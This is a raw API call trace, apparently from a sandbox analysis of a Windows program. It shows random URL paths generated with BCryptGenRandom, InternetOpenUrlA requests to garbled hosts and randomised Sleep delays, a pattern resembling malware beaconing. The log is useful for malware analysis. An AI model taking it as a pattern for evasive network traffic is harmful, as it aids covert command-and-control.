lstrcpyA (in: lpString1=0x4741c0, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0173.774] lstrcatA (in: lpString1="\x81\x03", lpString2="/gc075zg0y1UN4z0nkvhzmtahkjo175LWoxbC8qq8lc51/" | out: lpString1="\x81\x03/gc075zg0y1UN4z0nkvhzmtahkjo175LWoxbC8qq8lc51/") returned="\x81\x03/gc075zg0y1UN4z0nkvhzmtahkjo175LWoxbC8qq8lc51/" [0173.774] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0173.775] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/gc075zg0y1UN4z0nkvhzmtahkjo175LWoxbC8qq8lc51/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0173.775] GetProcessHeap () returned 0x440000 [0173.775] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0173.775] GetProcessHeap () returned 0x440000 [0173.775] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5130 | out: hHeap=0x440000) returned 1 [0173.776] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0173.776] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0173.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0173.776] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0173.776] Sleep (dwMilliseconds=0x1cd6d) [0173.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0173.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.884] GetProcessHeap () returned 0x440000 [0173.884] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0173.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0173.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b266, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a1b266) returned 0x0 [0173.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.070] GetProcessHeap () returned 0x440000 [0174.070] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0174.070] lstrcpyA (in: lpString1=0x473770, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0174.070] lstrcatA (in: lpString1="P²¡\x03", lpString2="/0Ognfnks037vpeq8gtlp/wJ86pswm1oOau397sTmmR405f5ffg5q4/" | out: lpString1="P²¡\x03/0Ognfnks037vpeq8gtlp/wJ86pswm1oOau397sTmmR405f5ffg5q4/") returned="P²¡\x03/0Ognfnks037vpeq8gtlp/wJ86pswm1oOau397sTmmR405f5ffg5q4/" [0174.070] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0174.070] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/0Ognfnks037vpeq8gtlp/wJ86pswm1oOau397sTmmR405f5ffg5q4/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0174.070] GetProcessHeap () returned 0x440000 [0174.070] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0174.070] GetProcessHeap () returned 0x440000 [0174.070] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0174.070] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0174.071] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0174.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0174.071] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0174.071] Sleep (dwMilliseconds=0xf9ce) [0174.198] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0174.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.199] GetProcessHeap () returned 0x440000 [0174.199] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0174.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0174.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0174.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b269, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a1b269) returned 0x0 [0174.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.206] BCryptGenRandom 